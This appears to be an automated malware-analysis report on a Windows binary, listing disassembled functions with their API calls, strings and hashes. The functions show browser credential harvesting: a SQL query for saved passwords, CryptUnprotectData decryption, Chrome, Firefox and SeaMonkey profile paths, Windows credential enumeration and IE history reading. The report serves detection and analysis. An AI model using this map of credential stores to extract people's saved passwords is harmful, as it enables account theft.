Instruction ID: 7a0d4c8da9719b4bd57d9e34dd235b5097b77d6fd782259e08ea59ad0a0aa82b
Opcode Fuzzy Hash: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
Instruction Fuzzy Hash: 774293B2509344ABD720EBA5D985BDBB3ECBF84304F01092FF588D3191EBB8D545879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF55, Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 00403C8C: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
Part of subcall function 00403C8C: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
Part of subcall function 00403C8C: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
Part of subcall function 00403C8C: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF81
GetModuleHandleW.KERNEL32(00000000,00414266,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF9A
EnumResourceTypesW.KERNEL32 ref: 0040FFA1

Strings

/deleteregkey, xrefs: 0041001B
/savelangfile, xrefs: 0040FFED
, xrefs: 0040FFB5

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 2744995895-28296030
Opcode ID: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
Instruction ID: 58268879d1a8d32d9d01966b45afca8998e7ac275f8ef3c48d75c103cdcc3135
Opcode Fuzzy Hash: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
Instruction Fuzzy Hash: A8518F71508745AFDB20AFA2DC49A9FB7A8FF45344F40083EF684E2152DB79D8848B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040299E, Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 250fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004029C4
CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004029DB
CopyFileW.KERNEL32(?,?,00000000), ref: 004029FC
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402A07
memset.MSVCRT ref: 00402A20
DeleteFileW.KERNEL32(?), ref: 00402C96

Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
Part of subcall function 004080FD: GetTempFileNameW.KERNEL32(?,004029F6,00000000,?), ref: 0040813D

memset.MSVCRT ref: 00402A95

Part of subcall function 00408C93: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,000003FF,000003FF,00402B19,?,?,000003FF,00000000), ref: 00408CA5

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00402B6E

Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD

memset.MSVCRT ref: 00402BF7
memcpy.MSVCRT ref: 00402C0A
MultiByteToWideChar.KERNEL32 ref: 00402C31
LocalFree.KERNEL32(?), ref: 00402C3A

Strings

SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402A61
chp, xrefs: 004029E6

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Filememset$ByteCharMultiWide$FreeLibraryTemp$AddressChangeCloseCopyCreateDeleteDirectoryFindLoadLocalNameNotificationPathProcWindowsmemcpy
String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
API String ID: 1340729801-1844170479
Opcode ID: 847b02111c32181764201ef2763939648a1449b727fd7f1631cfcf71ce955560
Instruction ID: 12325825b01e7d439ee1a457c4e284e7a4c6ca08c5b0c0223ff6c3e9a84d8d63
Opcode Fuzzy Hash: 847b02111c32181764201ef2763939648a1449b727fd7f1631cfcf71ce955560
Instruction Fuzzy Hash: 61819172D00128ABDB11EBA5DC85AEE7778EF44314F1404BAF618F7291DB785F448B68

Uniqueness

Uniqueness Score: -1.00%

Function 00409A23, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040978A: memset.MSVCRT ref: 004097B2
Part of subcall function 0040978A: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
Part of subcall function 0040978A: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
Part of subcall function 0040978A: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
Part of subcall function 0040978A: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
Part of subcall function 0040978A: _wcsicmp.MSVCRT ref: 004098B7

Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542

OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00409AC4
GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9

Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
Part of subcall function 004080FD: GetTempFileNameW.KERNEL32(?,004029F6,00000000,?), ref: 0040813D

Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6

CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
WriteFile.KERNEL32(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
CloseHandle.KERNEL32(?), ref: 00409B43
CloseHandle.KERNEL32(?), ref: 00409B48
CloseHandle.KERNEL32(00000000), ref: 00409B4D
CloseHandle.KERNEL32(00000000), ref: 00409B52

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00409A29
bhv, xrefs: 00409AE2

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseHandle$CreateProcess$CurrentTempView$??2@ChangeDirectoryDuplicateFindInformationMappingNameNotificationOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
API String ID: 3399910952-4002013007
Opcode ID: 3fa90e5644c1a4fc50ce3e3b894dc2718032181f1a1f1c2f7d5b065935081985
Instruction ID: fb70aa460989ca239fd235d66d785af6871ae45b3eb53ae5652ba3f6cf74083a
Opcode Fuzzy Hash: 3fa90e5644c1a4fc50ce3e3b894dc2718032181f1a1f1c2f7d5b065935081985
Instruction Fuzzy Hash: B9411776900118BBCF119FA5DC499DFBFB9FF09760F108066F604A6252C7749E40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00410D36, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410D59
memset.MSVCRT ref: 00410D6E
memset.MSVCRT ref: 00410D83
memset.MSVCRT ref: 00410D98
memset.MSVCRT ref: 00410DAD

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626

wcslen.MSVCRT ref: 00410DD3
wcslen.MSVCRT ref: 00410DE4
wcslen.MSVCRT ref: 00410E1C
wcslen.MSVCRT ref: 00410E2A
wcslen.MSVCRT ref: 00410E63
wcslen.MSVCRT ref: 00410E71
memset.MSVCRT ref: 00410EF7

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

Mozilla\SeaMonkey\Profiles, xrefs: 00410DCE, 00410DFB, 00410E17, 00410E42
Mozilla\SeaMonkey, xrefs: 00410E5E, 00410E89

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
API String ID: 2775653040-2068335096
Opcode ID: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
Instruction ID: 4a87cbf5aa2277a33565dd90cff8ebe3000d96c1f720339e2901549eb91f8fd8
Opcode Fuzzy Hash: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
Instruction Fuzzy Hash: 8451517254121C66DB20E762DD86FCE737C9F85314F1104ABE108E6142EFB99AC4CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00410F47, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410F6A
memset.MSVCRT ref: 00410F7F
memset.MSVCRT ref: 00410F94
memset.MSVCRT ref: 00410FA9
memset.MSVCRT ref: 00410FBE

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626

wcslen.MSVCRT ref: 00410FE4
wcslen.MSVCRT ref: 00410FF5
wcslen.MSVCRT ref: 0041102D
wcslen.MSVCRT ref: 0041103B
wcslen.MSVCRT ref: 00411074
wcslen.MSVCRT ref: 00411082
memset.MSVCRT ref: 00411108

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

Mozilla\Firefox, xrefs: 0041106F, 0041109A
Mozilla\Firefox\Profiles, xrefs: 00410FDF, 0041100C, 00411028, 00411053

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
API String ID: 2775653040-3369679110
Opcode ID: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
Instruction ID: 71a9fb945579d4cb0336c6bc71926503c314de5bf88e5d97c60d5b36565dc427
Opcode Fuzzy Hash: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
Instruction Fuzzy Hash: C3515E729012186ADB20EB51DD86FCF77BD9F85304F1140ABE208E2152EF799BC88B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00413627, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676

Strings

GetModuleBaseNameW, xrefs: 0041363E
GetModuleInformation, xrefs: 0041366C
GetModuleFileNameExW, xrefs: 00413654
EnumProcesses, xrefs: 00413660
psapi.dll, xrefs: 0041362D
EnumProcessModules, xrefs: 00413648

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2238633743-70141382
Opcode ID: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
Instruction ID: f29cbade6603fc4a2ab0b3c2c5315d136f5cdb5c857cdf3d96e229ab99d62a04
Opcode Fuzzy Hash: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
Instruction Fuzzy Hash: 07F0B774940784ABDB316F759C09E06BEE0EFA8701721491EE1C153A54D779E040CF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040956D, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00403B29: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
Part of subcall function 00403B29: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F

CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
wcslen.MSVCRT ref: 004095CC
wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
memset.MSVCRT ref: 00409679
memcpy.MSVCRT ref: 0040969A
_wcsnicmp.MSVCRT ref: 004096DF
wcschr.MSVCRT ref: 00409707
LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 0040972B

Strings

Microsoft_WinInet, xrefs: 004095BE
Microsoft_WinInet_, xrefs: 004096D9
J, xrefs: 0040964A

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
String ID: J$Microsoft_WinInet$Microsoft_WinInet_
API String ID: 1313344744-1864008983
Opcode ID: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
Instruction ID: ea1b4f48df4bf11ab27dc332c663e5edf47b9e63c97f7d7fc3a34612be846c77
Opcode Fuzzy Hash: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
Instruction Fuzzy Hash: A5511AB1D00209AFDF20DFA5C885AAEB7B8FF08304F14446AE919E7242D738AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0044472E, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,004454C0,00000070), ref: 0044473D
__set_app_type.MSVCRT ref: 0044479C
__p__fmode.MSVCRT ref: 004447B1
__p__commode.MSVCRT ref: 004447BF
__setusermatherr.MSVCRT ref: 004447EB
_initterm.MSVCRT ref: 00444801
__wgetmainargs.KERNELBASE ref: 00444824
_initterm.MSVCRT ref: 00444837
GetStartupInfoW.KERNEL32(?), ref: 00444894
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004448BA
exit.KERNELBASE ref: 004448D1
_cexit.MSVCRT ref: 004448D7

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
Instruction ID: 3deb3861b6046dda02d7dc4087396bab8fe4faf5ffc7b91e65a4640001166331
Opcode Fuzzy Hash: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
Instruction Fuzzy Hash: 3A51C279C00704DFEB30AFA5D8487AE77B4FB86711F20412BF451A7292D7788882CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A420, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A444

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A015
Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A02D
Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A049
Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A058
Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A09F
Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A0AE

Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542

FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
wcschr.MSVCRT ref: 0040A4D0
wcschr.MSVCRT ref: 0040A4F0
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
GetLastError.KERNEL32 ref: 0040A51F
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A54B
FindCloseUrlCache.WININET(?), ref: 0040A55C

Strings

visited:, xrefs: 0040A4B4

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
String ID: visited:
API String ID: 615219573-1702587658
Opcode ID: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
Instruction ID: a8741c9f70935d188a110af9e9e8f96ccbc1ec5a4ffe9cc29b4dc234b75738c1
Opcode Fuzzy Hash: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
Instruction Fuzzy Hash: 5F419F72900219BBDB10EFA5DC85AAEBBB8FF44754F10406AE504F3281DB789E51CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A94C, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA

Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25

Part of subcall function 0040A420: memset.MSVCRT ref: 0040A444
Part of subcall function 0040A420: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4D0
Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4F0
Part of subcall function 0040A420: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
Part of subcall function 0040A420: GetLastError.KERNEL32 ref: 0040A51F

Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A5DF
Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 0040A60D
Part of subcall function 0040A56F: _wcsupr.MSVCRT ref: 0040A627
Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A676
Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 0040A6A1

Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85

_wcslwr.MSVCRT ref: 0040AA14
wcslen.MSVCRT ref: 0040AA29

Strings

https://www.google.com/accounts/servicelogin, xrefs: 0040A98E
https://login.yahoo.com/config/login, xrefs: 0040A9A8
/, xrefs: 0040AA35
/, xrefs: 0040AA49
http://www.facebook.com/, xrefs: 0040A99B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
API String ID: 4091582287-4196376884
Opcode ID: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
Instruction ID: e8c4dab73010a582bcb55339b064a6b15101daee4fa053d2547f161988c3f8ed
Opcode Fuzzy Hash: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
Instruction Fuzzy Hash: C731D272700204AADB20BB6ACD41A9F7669EF80344F25087FB844FB1C6DB78DD91D699

Uniqueness

Uniqueness Score: -1.00%

Function 00409FF2, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A015
memset.MSVCRT ref: 0040A02D

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

wcslen.MSVCRT ref: 0040A049
wcslen.MSVCRT ref: 0040A058
wcslen.MSVCRT ref: 0040A09F
wcslen.MSVCRT ref: 0040A0AE

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040A043, 0040A048, 0040A071
Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040A09A, 0040A0C2

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
API String ID: 2036768262-2114579845
Opcode ID: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
Instruction ID: e8ec88334da27b7df1bd19bf5f92620076e348809ddf91dc3f5a530f518c7d73
Opcode Fuzzy Hash: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
Instruction Fuzzy Hash: F121A9B254021C55DB20E691DC85EDB73BCAF54314F5104BFF615E2081EBB8DA84465D

Uniqueness

Uniqueness Score: -1.00%

Function 0044376F, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 219COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00443820

Strings

no such vfs: %s, xrefs: 0044386A
temp, xrefs: 00443962
BINARY, xrefs: 00443889, 0044388E, 0044389A, 004438A6, 004438CB
main, xrefs: 00443952
NOCASE, xrefs: 004438E3
RTRIM, xrefs: 004438B2

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
API String ID: 3510742995-2641926074
Opcode ID: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
Instruction ID: 2a909f6aa8b78d8aa74dd045bbec2887fe81728cdb5ed6237a850f532ee9234f
Opcode Fuzzy Hash: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
Instruction Fuzzy Hash: 5A711CB1600201BFF310AF1ADC82B5AB798BB44719F15452FF45897782C7BDE9908B99

Uniqueness

Uniqueness Score: -1.00%

Function 00410A52, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00410C87: memset.MSVCRT ref: 00410CA3
Part of subcall function 00410C87: memset.MSVCRT ref: 00410CB8
Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410CE1
Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410D0A

memset.MSVCRT ref: 00410A9A
wcslen.MSVCRT ref: 00410AB1
wcslen.MSVCRT ref: 00410AB9
wcslen.MSVCRT ref: 00410B14
wcslen.MSVCRT ref: 00410B22

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

history.dat, xrefs: 00410A7A, 00410AB6, 00410AC8
places.sqlite, xrefs: 00410B1B, 00410B30

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memsetwcscat$wcscpy
String ID: history.dat$places.sqlite
API String ID: 2541527827-467022611
Opcode ID: c2985aa8b704297109810192aa09eefcc2eb1dcc6c122f6f24f6b4785e23aec6
Instruction ID: 16c00ee82f17989474e920b03892a6de4e18c3fe0141c7e4295d5dc86641310b
Opcode Fuzzy Hash: c2985aa8b704297109810192aa09eefcc2eb1dcc6c122f6f24f6b4785e23aec6
Instruction Fuzzy Hash: 17314571D041189ADF10EBA5DC89ACDB3B8AF50319F20457FE554F2182EB7C9A84CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00411CDB, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411CFD
wcslen.MSVCRT ref: 00411D08
wcslen.MSVCRT ref: 00411D16
wcslen.MSVCRT ref: 00411D6C
wcslen.MSVCRT ref: 00411D7A

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

Login Data, xrefs: 00411D72, 00411D77, 00411D88
Web Data, xrefs: 00411D0E, 00411D13, 00411D29

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memsetwcscatwcscpy
String ID: Login Data$Web Data
API String ID: 3932597654-4228647177
Opcode ID: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
Instruction ID: 9a91d2e82c236d30763d7b9ebcc1a6cccb69c4478b10b945406aecd22e6d63c1
Opcode Fuzzy Hash: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
Instruction Fuzzy Hash: 46218B7250411C6ADB10EB55EC89FDA73ACAF50328F14487FF518E3191EBBCDAC44658

Uniqueness

Uniqueness Score: -1.00%

Function 00417C9A, Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,-7FBE8982,00000003,00000000,?,?,00000000), ref: 00417D72
CreateFileA.KERNEL32(?,-7FBE8982,00000003,00000000,004175FE,004175FE,00000000), ref: 00417D8A
GetLastError.KERNEL32 ref: 00417D99
free.MSVCRT(?), ref: 00417DA6

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile$ErrorLastfree
String ID:
API String ID: 77810686-0
Opcode ID: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
Instruction ID: 35fec4397722218e6507e77f53b50855b574b2e4c8baf302a97b237cc2aa3bd3
Opcode Fuzzy Hash: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
Instruction Fuzzy Hash: D841F27150C3059FEB20CF25EC4179BBBF4EF84314F10892EF89592291D738DA848B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC4E, Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON

Download Yara Rule

